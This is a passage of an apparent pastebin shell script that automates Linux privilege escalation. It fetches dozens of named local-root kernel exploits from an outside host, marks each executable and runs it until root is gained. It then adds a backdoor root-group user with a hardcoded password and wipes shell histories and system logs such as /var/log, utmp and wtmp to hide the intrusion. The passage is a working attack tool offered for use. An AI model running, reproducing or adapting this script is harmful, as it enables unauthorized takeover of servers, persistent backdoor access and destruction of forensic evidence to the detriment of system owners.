  1080.     $DLER http://bie.nazuka.net/localroot/2011\ LocalRoot\ For\ 2.6.18-128.el5
  1081.     if [ $CURLIT -z ] 2> /dev/null
  1082.     then
  1083.         chmod 777 2011\ LocalRoot\ For\ 2.6.18-128.el5
  1084.         ./2011\ LocalRoot\ For\ 2.6.18-128.el5
  1085.     else
  1086.         chmod 777 hisetup
  1087.         ./hisetup
  1088.     fi
  1089.     fcheckr00t
  1090. fi
  1091.  
  1092. if [ $GOTROOT -z ] 2> /dev/null
  1093. then
  1094.     $DLER http://bie.nazuka.net/localroot/21
  1095.     if [ $CURLIT -z ] 2> /dev/null
  1096.     then
  1097.         chmod 777 21
  1098.         ./21
  1099.     else
  1100.         chmod 777 hisetup
  1101.         ./hisetup
  1102.     fi
  1103.     fcheckr00t
  1104. fi
  1105.  
  1106. if [ $GOTROOT -z ] 2> /dev/null
  1107. then
  1108.     $DLER http://bie.nazuka.net/localroot/3
  1109.     if [ $CURLIT -z ] 2> /dev/null
  1110.     then
  1111.         chmod 777 3
  1112.         ./3
  1113.     else
  1114.         chmod 777 hisetup
  1115.         ./hisetup
  1116.     fi
  1117.     fcheckr00t
  1118. fi
  1119.  
  1120. if [ $GOTROOT -z ] 2> /dev/null
  1121. then
  1122.     $DLER http://bie.nazuka.net/localroot/3.4.6-9-2007
  1123.     if [ $CURLIT -z ] 2> /dev/null
  1124.     then
  1125.         chmod 777 3.4.6-9-2007
  1126.         ./3.4.6-9-2007
  1127.     else
  1128.         chmod 777 hisetup
  1129.         ./hisetup
  1130.     fi
  1131.     fcheckr00t
  1132. fi
  1133.  
  1134. if [ $GOTROOT -z ] 2> /dev/null
  1135. then
  1136.     $DLER http://bie.nazuka.net/localroot/31
  1137.     if [ $CURLIT -z ] 2> /dev/null
  1138.     then
  1139.         chmod 777 31
  1140.         ./31
  1141.     else
  1142.         chmod 777 hisetup
  1143.         ./hisetup
  1144.     fi
  1145.     fcheckr00t
  1146. fi
  1147.  
  1148. if [ $GOTROOT -z ] 2> /dev/null
  1149. then
  1150.     $DLER http://bie.nazuka.net/localroot/36-rc1
  1151.     if [ $CURLIT -z ] 2> /dev/null
  1152.     then
  1153.         chmod 777 36-rc1
  1154.         ./36-rc1
  1155.     else
  1156.         chmod 777 hisetup
  1157.         ./hisetup
  1158.     fi
  1159.     fcheckr00t
  1160. fi
  1161.  
  1162. if [ $GOTROOT -z ] 2> /dev/null
  1163. then
  1164.     $DLER http://bie.nazuka.net/localroot/4
  1165.     if [ $CURLIT -z ] 2> /dev/null
  1166.     then
  1167.         chmod 777 4
  1168.         ./4
  1169.     else
  1170.         chmod 777 hisetup
  1171.         ./hisetup
  1172.     fi
  1173.     fcheckr00t
  1174. fi
  1175.  
  1176. if [ $GOTROOT -z ] 2> /dev/null
  1177. then
  1178.     $DLER http://bie.nazuka.net/localroot/44
  1179.     if [ $CURLIT -z ] 2> /dev/null
  1180.     then
  1181.         chmod 777 44
  1182.         ./44
  1183.     else
  1184.         chmod 777 hisetup
  1185.         ./hisetup
  1186.     fi
  1187.     fcheckr00t
  1188. fi
  1189.  
  1190. if [ $GOTROOT -z ] 2> /dev/null
  1191. then
  1192.     $DLER http://bie.nazuka.net/localroot/47
  1193.     if [ $CURLIT -z ] 2> /dev/null
  1194.     then
  1195.         chmod 777 47
  1196.         ./47
  1197.     else
  1198.         chmod 777 hisetup
  1199.         ./hisetup
  1200.     fi
  1201.     fcheckr00t
  1202. fi
  1203.  
  1204. if [ $GOTROOT -z ] 2> /dev/null
  1205. then
  1206.     $DLER http://bie.nazuka.net/localroot/5
  1207.     if [ $CURLIT -z ] 2> /dev/null
  1208.     then
  1209.         chmod 777 5
  1210.         ./5
  1211.     else
  1212.         chmod 777 hisetup
  1213.         ./hisetup
  1214.     fi
  1215.     fcheckr00t
  1216. fi
  1217.  
  1218. if [ $GOTROOT -z ] 2> /dev/null
  1219. then
  1220.     $DLER http://bie.nazuka.net/localroot/50
  1221.     if [ $CURLIT -z ] 2> /dev/null
  1222.     then
  1223.         chmod 777 50
  1224.         ./50
  1225.     else
  1226.         chmod 777 hisetup
  1227.         ./hisetup
  1228.     fi
  1229.     fcheckr00t
  1230. fi
  1231.  
  1232. if [ $GOTROOT -z ] 2> /dev/null
  1233. then
  1234.     $DLER http://bie.nazuka.net/localroot/54
  1235.     if [ $CURLIT -z ] 2> /dev/null
  1236.     then
  1237.         chmod 777 54
  1238.         ./54
  1239.     else
  1240.         chmod 777 hisetup
  1241.         ./hisetup
  1242.     fi
  1243.     fcheckr00t
  1244. fi
  1245.  
  1246. if [ $GOTROOT -z ] 2> /dev/null
  1247. then
  1248.     $DLER http://bie.nazuka.net/localroot/6
  1249.     if [ $CURLIT -z ] 2> /dev/null
  1250.     then
  1251.         chmod 777 6
  1252.         ./6
  1253.     else
  1254.         chmod 777 hisetup
  1255.         ./hisetup
  1256.     fi
  1257.     fcheckr00t
  1258. fi
  1259.  
  1260. if [ $GOTROOT -z ] 2> /dev/null
  1261. then
  1262.     $DLER http://bie.nazuka.net/localroot/67
  1263.     if [ $CURLIT -z ] 2> /dev/null
  1264.     then
  1265.         chmod 777 67
  1266.         ./67
  1267.     else
  1268.         chmod 777 hisetup
  1269.         ./hisetup
  1270.     fi
  1271.     fcheckr00t
  1272. fi
  1273.  
  1274. if [ $GOTROOT -z ] 2> /dev/null
  1275. then
  1276.     $DLER http://bie.nazuka.net/localroot/7
  1277.     if [ $CURLIT -z ] 2> /dev/null
  1278.     then
  1279.         chmod 777 7
  1280.         ./7
  1281.     else
  1282.         chmod 777 hisetup
  1283.         ./hisetup
  1284.     fi
  1285.     fcheckr00t
  1286. fi
  1287.  
  1288. if [ $GOTROOT -z ] 2> /dev/null
  1289. then
  1290.     if [ $CURLIT -z ] 2> /dev/null
  1291.     then
  1292.         $DLER http://bie.nazuka.net/localroot/7-2
  1293.         chmod 777 7-2
  1294.         ./7-2
  1295.     else
  1296.         chmod 777 hisetup
  1297.         ./hisetup
  1298.     fi
  1299.     fcheckr00t
  1300. fi
  1301.  
  1302. if [ $GOTROOT -z ] 2> /dev/null
  1303. then
  1304.     $DLER http://bie.nazuka.net/localroot/7x
  1305.     if [ $CURLIT -z ] 2> /dev/null
  1306.     then
  1307.         chmod 777 7x
  1308.         ./7x
  1309.     else
  1310.         chmod 777 hisetup
  1311.         ./hisetup
  1312.     fi
  1313.     fcheckr00t
  1314. fi
  1315.  
  1316. if [ $GOTROOT -z ] 2> /dev/null
  1317. then
  1318.     $DLER http://bie.nazuka.net/localroot/8
  1319.     if [ $CURLIT -z ] 2> /dev/null
  1320.     then
  1321.         chmod 777 8
  1322.         ./8
  1323.     else
  1324.         chmod 777 hisetup
  1325.         ./hisetup
  1326.     fi
  1327.     fcheckr00t
  1328. fi
  1329.  
  1330. if [ $GOTROOT -z ] 2> /dev/null
  1331. then
  1332.     $DLER http://bie.nazuka.net/localroot/9
  1333.     if [ $CURLIT -z ] 2> /dev/null
  1334.     then
  1335.         chmod 777 9
  1336.         ./9
  1337.     else
  1338.         chmod 777 hisetup
  1339.         ./hisetup
  1340.     fi
  1341.     fcheckr00t
  1342. fi
  1343.  
  1344. if [ $GOTROOT -z ] 2> /dev/null
  1345. then
  1346.     $DLER http://bie.nazuka.net/localroot/90
  1347.     if [ $CURLIT -z ] 2> /dev/null
  1348.     then
  1349.         chmod 777 90
  1350.         ./90
  1351.     else
  1352.         chmod 777 hisetup
  1353.         ./hisetup
  1354.     fi
  1355.     fcheckr00t
  1356. fi
  1357.  
  1358. if [ $GOTROOT -z ] 2> /dev/null
  1359. then
  1360.     $DLER http://bie.nazuka.net/localroot/94
  1361.     if [ $CURLIT -z ] 2> /dev/null
  1362.     then
  1363.         chmod 777 94
  1364.         ./94
  1365.     else
  1366.         chmod 777 hisetup
  1367.         ./hisetup
  1368.     fi
  1369.     fcheckr00t
  1370. fi
  1371.  
  1372. if [ $GOTROOT -z ] 2> /dev/null
  1373. then
  1374.     $DLER 'http://bie.nazuka.net/localroot/Linux_2.6(1).12'
  1375.     if [ $CURLIT -z ] 2> /dev/null
  1376.     then
  1377.         chmod 777 Linux_2.6\(1\).12
  1378.         ./Linux_2.6\(1\).12
  1379.     else
  1380.         chmod 777 hisetup
  1381.         ./hisetup
  1382.     fi
  1383.     fcheckr00t
  1384. fi
  1385.  
  1386. if [ $GOTROOT -z ] 2> /dev/null
  1387. then
  1388.     $DLER http://bie.nazuka.net/localroot/Linux_2.6.12
  1389.     if [ $CURLIT -z ] 2> /dev/null
  1390.     then
  1391.         chmod 777 Linux_2.6.12
  1392.         ./Linux_2.6.12
  1393.     else
  1394.         chmod 777 hisetup
  1395.         ./hisetup
  1396.     fi
  1397.     fcheckr00t
  1398. fi
  1399.  
  1400. if [ $GOTROOT -z ] 2> /dev/null
  1401. then
  1402.     $DLER http://bie.nazuka.net/localroot/Linux_2.6.9-joolyshit
  1403.     if [ $CURLIT -z ] 2> /dev/null
  1404.     then
  1405.         chmod 777 Linux_2.6.9-joolyshit
  1406.         ./2.6.18-2011
  1407.     else
  1408.         chmod 777 hisetup
  1409.         ./hisetup
  1410.     fi
  1411.     fcheckr00t
  1412. fi
  1413.  
  1414. if [ $GOTROOT -z ] 2> /dev/null
  1415. then
  1416.     $DLER http://bie.nazuka.net/localroot/acid
  1417.     if [ $CURLIT -z ] 2> /dev/null
  1418.     then
  1419.         chmod 777 acid
  1420.         ./acid
  1421.     else
  1422.         chmod 777 hisetup
  1423.         ./hisetup
  1424.     fi
  1425.     fcheckr00t
  1426. fi
  1427.  
  1428. if [ $GOTROOT -z ] 2> /dev/null
  1429. then
  1430.     $DLER http://bie.nazuka.net/localroot/d3vil
  1431.     if [ $CURLIT -z ] 2> /dev/null
  1432.     then
  1433.         chmod 777 d3vil
  1434.         ./d3vil
  1435.     else
  1436.         chmod 777 hisetup
  1437.         ./hisetup
  1438.     fi
  1439.     fcheckr00t
  1440. fi
  1441.  
  1442. if [ $GOTROOT -z ] 2> /dev/null
  1443. then
  1444.     $DLER http://bie.nazuka.net/localroot/exp1
  1445.     if [ $CURLIT -z ] 2> /dev/null
  1446.     then
  1447.         chmod 777 exp1
  1448.         ./exp1
  1449.     else
  1450.         chmod 777 hisetup
  1451.         ./hisetup
  1452.     fi
  1453.     fcheckr00t
  1454. fi
  1455.  
  1456. if [ $GOTROOT -z ] 2> /dev/null
  1457. then
  1458.     $DLER http://bie.nazuka.net/localroot/exp2
  1459.     if [ $CURLIT -z ] 2> /dev/null
  1460.     then
  1461.         chmod 777 exp2
  1462.         ./exp2
  1463.     else
  1464.         chmod 777 hisetup
  1465.         ./hisetup
  1466.     fi
  1467.     fcheckr00t
  1468. fi
  1469.  
  1470. if [ $GOTROOT -z ] 2> /dev/null
  1471. then
  1472.     $DLER http://bie.nazuka.net/localroot/exp3
  1473.     if [ $CURLIT -z ] 2> /dev/null
  1474.     then
  1475.         chmod 777 exp3
  1476.         ./exp3
  1477.     else
  1478.         chmod 777 hisetup
  1479.         ./hisetup
  1480.     fi
  1481.     fcheckr00t
  1482. fi
  1483.  
  1484. if [ $GOTROOT -z ] 2> /dev/null
  1485. then
  1486.     $DLER http://bie.nazuka.net/localroot/exploit
  1487.     if [ $CURLIT -z ] 2> /dev/null
  1488.     then
  1489.         chmod 777 exploit
  1490.         ./exploit
  1491.     else
  1492.         chmod 777 hisetup
  1493.         ./hisetup
  1494.     fi
  1495.     fcheckr00t
  1496. fi
  1497.  
  1498. if [ $GOTROOT -z ] 2> /dev/null
  1499. then
  1500.     $DLER http://bie.nazuka.net/localroot/full-nelson
  1501.     if [ $CURLIT -z ] 2> /dev/null
  1502.     then
  1503.         chmod 777 full-nelson
  1504.         ./full-nelson
  1505.     else
  1506.         chmod 777 hisetup
  1507.         ./hisetup
  1508.     fi
  1509.     fcheckr00t
  1510. fi
  1511.  
  1512. if [ $GOTROOT -z ] 2> /dev/null
  1513. then
  1514.     $DLER http://bie.nazuka.net/localroot/gayros
  1515.     if [ $CURLIT -z ] 2> /dev/null
  1516.     then
  1517.         chmod 777 gayros
  1518.         ./gayros
  1519.     else
  1520.         chmod 777 hisetup
  1521.         ./hisetup
  1522.     fi
  1523.     fcheckr00t
  1524. fi
  1525.  
  1526. if [ $GOTROOT -z ] 2> /dev/null
  1527. then
  1528.     $DLER http://bie.nazuka.net/localroot/lenis.sh
  1529.     if [ $CURLIT -z ] 2> /dev/null
  1530.     then
  1531.         chmod 777 lenis.sh
  1532.         ./lenis.sh
  1533.     else
  1534.         chmod 777 hisetup
  1535.         ./hisetup
  1536.     fi
  1537.     fcheckr00t
  1538. fi
  1539.  
  1540. if [ $GOTROOT -z ] 2> /dev/null
  1541. then
  1542.     $DLER http://bie.nazuka.net/localroot/local-2.6.9-2005-2006
  1543.     if [ $CURLIT -z ] 2> /dev/null
  1544.     then
  1545.         chmod 777 local-2.6.9-2005-2006
  1546.         ./local-2.6.9-2005-2006
  1547.     else
  1548.         chmod 777 hisetup
  1549.         ./hisetup
  1550.     fi
  1551.     fcheckr00t
  1552. fi
  1553.  
  1554. if [ $GOTROOT -z ] 2> /dev/null
  1555. then
  1556.     $DLER http://bie.nazuka.net/localroot/local-root-exploit-gayros
  1557.     if [ $CURLIT -z ] 2> /dev/null
  1558.     then
  1559.         chmod 777 local-root-exploit-gayros
  1560.         ./local-root-exploit-gayros
  1561.     else
  1562.         chmod 777 hisetup
  1563.         ./hisetup
  1564.     fi
  1565.     fcheckr00t
  1566. fi
  1567.  
  1568. if [ $GOTROOT -z ] 2> /dev/null
  1569. then
  1570.     $DLER http://bie.nazuka.net/localroot/priv4
  1571.     if [ $CURLIT -z ] 2> /dev/null
  1572.     then
  1573.         chmod 777 priv4
  1574.         ./priv4
  1575.     else
  1576.         chmod 777 hisetup
  1577.         ./hisetup
  1578.     fi
  1579.     fcheckr00t
  1580. fi
  1581.  
  1582. if [ $GOTROOT -z ] 2> /dev/null
  1583. then
  1584.     $DLER http://bie.nazuka.net/localroot/pwnkernel
  1585.     if [ $CURLIT -z ] 2> /dev/null
  1586.     then
  1587.         chmod 777 pwnkernel
  1588.         ./pwnkernel
  1589.     else
  1590.         chmod 777 hisetup
  1591.         ./hisetup
  1592.     fi
  1593.     fcheckr00t
  1594. fi
  1595.  
  1596. if [ $GOTROOT -z ] 2> /dev/null
  1597. then
  1598.     $DLER http://bie.nazuka.net/localroot/root.py
  1599.     if [ $CURLIT -z ] 2> /dev/null
  1600.     then
  1601.         chmod 777 root.py
  1602.         ./root.py
  1603.     else
  1604.         chmod 777 hisetup
  1605.         ./hisetup
  1606.     fi
  1607.     fcheckr00t
  1608. fi
  1609.  
  1610. if [ $GOTROOT -z ] 2> /dev/null
  1611. then
  1612.     $DLER http://bie.nazuka.net/localroot/runx
  1613.     if [ $CURLIT -z ] 2> /dev/null
  1614.     then
  1615.         chmod 777 runx
  1616.         ./runx
  1617.     else
  1618.         chmod 777 hisetup
  1619.         ./hisetup
  1620.     fi
  1621.     fcheckr00t
  1622. fi
  1623.  
  1624. if [ $GOTROOT -z ] 2> /dev/null
  1625. then
  1626.     $DLER http://bie.nazuka.net/localroot/tivoli
  1627.     if [ $CURLIT -z ] 2> /dev/null
  1628.     then
  1629.         chmod 777 tivoli
  1630.         ./tivoli
  1631.     else
  1632.         chmod 777 hisetup
  1633.         ./hisetup
  1634.     fi
  1635.     fcheckr00t
  1636. fi
  1637.  
  1638. if [ $GOTROOT -z ] 2> /dev/null
  1639. then
  1640.     $DLER http://bie.nazuka.net/localroot/ubuntu
  1641.     if [ $CURLIT -z ] 2> /dev/null
  1642.     then
  1643.         chmod 777 ubuntu
  1644.         ./ubuntu
  1645.     else
  1646.         chmod 777 hisetup
  1647.         ./hisetup
  1648.     fi
  1649.     fcheckr00t
  1650. fi
  1651.  
  1652. if [ $GOTROOT -z ] 2> /dev/null
  1653. then
  1654.     $DLER http://bie.nazuka.net/localroot/vmsplice-local-root-exploit
  1655.     if [ $CURLIT -z ] 2> /dev/null
  1656.     then
  1657.         chmod 777 vmsplice-local-root-exploit
  1658.         ./vmsplice-local-root-exploit
  1659.     else
  1660.         chmod 777 hisetup
  1661.         ./hisetup
  1662.     fi
  1663.     fcheckr00t
  1664. fi
  1665.  
  1666. if [ $GOTROOT -z ] 2> /dev/null
  1667. then
  1668.     $DLER http://bie.nazuka.net/localroot/z1d-2011
  1669.     if [ $CURLIT -z ] 2> /dev/null
  1670.     then
  1671.         chmod 777 z1d-2011
  1672.         ./z1d-2011
  1673.     else
  1674.         chmod 777 hisetup
  1675.         ./hisetup
  1676.     fi
  1677.     fcheckr00t
  1678. fi
  1679.  
  1680. cd ..
  1681. rm -rf exploits
  1682. CNT=''
  1683. DLER=''
  1684. CURLIT=''
  1685.  
  1686. if [ $GOTROOT = 1 ] 2> /dev/null
  1687. then
  1688.     RUSER='Gabby'
  1689.     RPASS='g0tr00t'
  1690.     echo ' [*] Adding r00t user..'
  1691.     useradd -g 0 -G root -M -s /bin/bash -p $RPASS $RUSER
  1692.     echo
  1693.     echo " [*] Added r00t user: $RUSER"
  1694.     echo " [*] p455w0rd:  $RPASS"
  1695.     echo " [*] Clearing logs.."
  1696.     RPASS=''
  1697.     RUSER=''
  1698.     GOTROOT=''
  1699.     rm -rf /tmp/logs 2> /dev/null
  1700.     rm -rf /root/.ksh_history 2> /dev/null
  1701.     rm -rf /root/.bash_history 2> /dev/null
  1702.     rm -rf /root/.bash_logout 2> /dev/null
  1703.     rm -rf /var/run/utmp 2> /dev/null
  1704.     rm -rf /var/logs 2> /dev/null
  1705.     rm -rf /var/log 2> /dev/null
  1706.     rm -rf /var/adm 2> /dev/null
  1707.     rm -rf /etc/wtmp 2> /dev/null
  1708.     rm -rf /etc/utmp 2> /dev/null
  1709.     echo " [*] You g0tr00t, horray for you..."
  1710.     whoami
  1711.     id
  1712. else
  1713.     echo " [*] You didn't g0tr00t, sucks to be you..."
  1714.     whoami
  1715.     id
  1716. fi
Advertisement
Add Comment
Please, Sign In to add comment